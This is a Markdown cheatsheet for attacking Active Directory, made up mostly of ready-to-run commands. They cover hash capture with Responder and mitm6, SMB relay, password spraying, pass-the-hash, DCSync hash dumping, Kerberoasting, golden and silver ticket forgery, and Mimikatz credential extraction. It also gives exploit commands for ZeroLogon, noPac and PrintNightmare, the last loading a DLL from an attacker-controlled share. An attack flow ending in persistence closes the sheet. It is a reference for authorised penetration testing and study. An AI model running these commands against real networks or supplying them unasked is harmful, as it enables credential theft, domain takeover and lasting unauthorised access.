8.5 KiB
8.5 KiB
Active Directory Pentesting Cheatsheet
Quick reference for Active Directory enumeration, attacks, and post-exploitation.
AD Overview
Key Components
| Component | Description |
|---|---|
| Domain Controller (DC) | Central AD server, holds NTDS.dit |
| NTDS.dit | AD database with all user hashes |
| SYSVOL | Shared folder with GPOs and scripts |
| Kerberos | Authentication protocol |
| LDAP | Directory query protocol |
Common Ports
| Port | Service |
|---|---|
| 53 | DNS |
| 88 | Kerberos |
| 135 | RPC |
| 139 | NetBIOS |
| 389 | LDAP |
| 445 | SMB |
| 464 | Kerberos password change |
| 636 | LDAPS |
| 3268 | Global Catalog |
| 3389 | RDP |
Initial Attack Vectors
LLMNR/NBT-NS Poisoning
Concept: Intercept failed DNS lookups to capture NTLMv2 hashes.
# Start Responder
responder -I eth0 -rdwv
# Wait for authentication attempts...
# Captured hash format: user::domain:challenge:response:ntlmv2
# Crack with hashcat
hashcat -m 5600 hash.txt rockyou.txt
Mitigation: Disable LLMNR and NBT-NS via GPO.
SMB Relay
Concept: Relay captured credentials to another machine (if SMB signing is disabled).
# 1. Check for SMB signing
crackmapexec smb 192.168.1.0/24 --gen-relay-list targets.txt
# 2. Configure Responder (disable SMB/HTTP)
# Edit /etc/responder/Responder.conf
# SMB = Off
# HTTP = Off
# 3. Start ntlmrelayx
impacket-ntlmrelayx -tf targets.txt -smb2support
# 4. Start Responder
responder -I eth0 -rdwv
# For shell access:
impacket-ntlmrelayx -tf targets.txt -smb2support -i
# Then connect with nc to the specified port
IPv6 DNS Takeover
# mitm6 spoofs as IPv6 DNS server
mitm6 -d domain.local
# Relay with ntlmrelayx
impacket-ntlmrelayx -6 -t ldaps://dc.domain.local -wh fakewpad.domain.local -l loot
Post-Compromise Enumeration
Domain Information
# From Windows
net user /domain
net group /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
# PowerView
. .\PowerView.ps1
Get-Domain
Get-DomainController
Get-DomainUser
Get-DomainGroup
Get-DomainComputer
BloodHound
# Install
sudo apt install bloodhound neo4j
# Start neo4j
sudo neo4j console
# Navigate to http://localhost:7474, login neo4j:neo4j, change password
# Start BloodHound
bloodhound
# Collect data with SharpHound
powershell -ep bypass
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain domain.local -ZipFileName output.zip
# Or use bloodhound-python from Linux
bloodhound-python -u user -p 'password' -d domain.local -ns <DC-IP> -c all
Key Queries:
- "Find Shortest Paths to Domain Admins"
- "Find Principals with DCSync Rights"
- "List all Kerberoastable Accounts"
Credential Attacks
Pass the Password
# Spray password across network
crackmapexec smb 192.168.1.0/24 -u username -d DOMAIN -p 'Password123'
# Check specific hosts
crackmapexec smb 192.168.1.100 -u username -d DOMAIN -p 'Password123'
# Execute command
crackmapexec smb 192.168.1.100 -u user -d DOMAIN -p 'pass' -x 'whoami'
# Get shell with psexec
impacket-psexec DOMAIN/user:'password'@192.168.1.100
Pass the Hash
Note: Only NTLM hashes work, not NTLMv2.
# With CrackMapExec
crackmapexec smb 192.168.1.0/24 -u user -H <NTLM_hash> --local-auth
# Get shell
impacket-psexec user@192.168.1.100 -hashes <LM:NTLM>
impacket-wmiexec user@192.168.1.100 -hashes <LM:NTLM>
# Example (blank LM hash)
impacket-psexec administrator@192.168.1.100 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
Dumping Hashes
# With credentials
impacket-secretsdump DOMAIN/user:'password'@192.168.1.100
# With hash
impacket-secretsdump user@192.168.1.100 -hashes <LM:NTLM>
# From DC (DCSync)
impacket-secretsdump DOMAIN/admin:'password'@DC-IP -just-dc-ntlm
Cracking Hashes
# NTLM hashes
hashcat -m 1000 ntlm_hashes.txt rockyou.txt
# NTLMv2 hashes (from Responder)
hashcat -m 5600 ntlmv2_hashes.txt rockyou.txt
# Kerberos TGS (Kerberoasting)
hashcat -m 13100 tgs_hashes.txt rockyou.txt
# Kerberos AS-REP (AS-REP Roasting)
hashcat -m 18200 asrep_hashes.txt rockyou.txt
Kerberos Attacks
Kerberoasting
Concept: Request TGS tickets for SPNs, crack service account passwords offline.
# Get TGS tickets
impacket-GetUserSPNs DOMAIN/user:password -dc-ip <DC-IP> -request
# Save hash and crack
hashcat -m 13100 tgs_hash.txt rockyou.txt
# From Windows with Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt
Mitigation: Strong service account passwords, Managed Service Accounts.
AS-REP Roasting
Concept: Get AS-REP for accounts without pre-authentication.
# Find vulnerable accounts and get hashes
impacket-GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip <DC-IP> -format hashcat
# Crack
hashcat -m 18200 asrep_hash.txt rockyou.txt
Golden Ticket
Concept: Forge TGT with krbtgt hash for persistent domain access.
# Get krbtgt hash (requires DA)
impacket-secretsdump DOMAIN/admin:password@DC-IP -just-dc-user krbtgt
# Create golden ticket
impacket-ticketer -nthash <krbtgt_hash> -domain-sid <domain_sid> -domain DOMAIN administrator
# Use ticket
export KRB5CCNAME=administrator.ccache
impacket-psexec DOMAIN/administrator@target -k -no-pass
Silver Ticket
Concept: Forge TGS for specific service with service account hash.
# Create silver ticket for CIFS (file shares)
impacket-ticketer -nthash <service_hash> -domain-sid <domain_sid> -domain DOMAIN -spn CIFS/target.domain.local user
export KRB5CCNAME=user.ccache
impacket-smbclient //target.domain.local/share -k -no-pass
Token Impersonation
# Incognito (Meterpreter)
load incognito
list_tokens -u
impersonate_token "DOMAIN\\Administrator"
# With Mimikatz
privilege::debug
token::elevate
Mimikatz
# Dump credentials
privilege::debug
sekurlsa::logonpasswords
# DCSync attack
lsadump::dcsync /domain:domain.local /user:Administrator
# Pass the hash
sekurlsa::pth /user:admin /domain:domain.local /ntlm:<hash>
# Golden ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:<domain_sid> /krbtgt:<hash> /ptt
# Dump SAM
lsadump::sam
Lateral Movement
PsExec
impacket-psexec DOMAIN/user:password@target
impacket-psexec user@target -hashes <LM:NTLM>
WMIExec
impacket-wmiexec DOMAIN/user:password@target
Evil-WinRM
evil-winrm -i target -u user -p password
evil-winrm -i target -u user -H <NTLM_hash>
SMBExec
impacket-smbexec DOMAIN/user:password@target
Known Vulnerabilities
ZeroLogon (CVE-2020-1472)
# Test
python3 zerologon_tester.py DC-NAME DC-IP
# Exploit (resets DC password to empty)
python3 cve-2020-1472-exploit.py DC-NAME DC-IP
# Dump hashes
impacket-secretsdump -just-dc -no-pass DC-NAME\$@DC-IP
PrintNightmare (CVE-2021-1675 / CVE-2021-34527)
# Check vulnerability
rpcdump.py @DC-IP | grep MS-RPRN
rpcdump.py @DC-IP | grep MS-PAR
# Exploit
python3 CVE-2021-1675.py DOMAIN/user:password@DC-IP '\\attacker-ip\share\evil.dll'
noPac (CVE-2021-42278 / CVE-2021-42287)
# Scanner
python3 scanner.py DOMAIN/user:password -dc-ip DC-IP
# Exploit
python3 noPac.py DOMAIN/user:password -dc-ip DC-IP -shell
Useful Tools
| Tool | Purpose |
|---|---|
| CrackMapExec | Swiss army knife for AD |
| Impacket | Python AD tools suite |
| BloodHound | AD attack path visualization |
| Mimikatz | Credential extraction |
| Rubeus | Kerberos abuse |
| PowerView | PowerShell AD recon |
| Evil-WinRM | WinRM shell |
| Responder | LLMNR/NBT-NS poisoning |
| kerbrute | Kerberos brute forcing |
Attack Flow
1. LLMNR/NBT-NS Poisoning
↓
2. Crack hashes / Relay attacks
↓
3. Enumerate with BloodHound
↓
4. Kerberoast service accounts
↓
5. Lateral movement (Pass the Hash/Password)
↓
6. Find path to Domain Admin
↓
7. DCSync for all hashes
↓
8. Golden Ticket for persistence
Resources
- WADComs - AD command reference
- HackTricks AD
- PayloadsAllTheThings AD
- The Hacker Recipes
- ired.team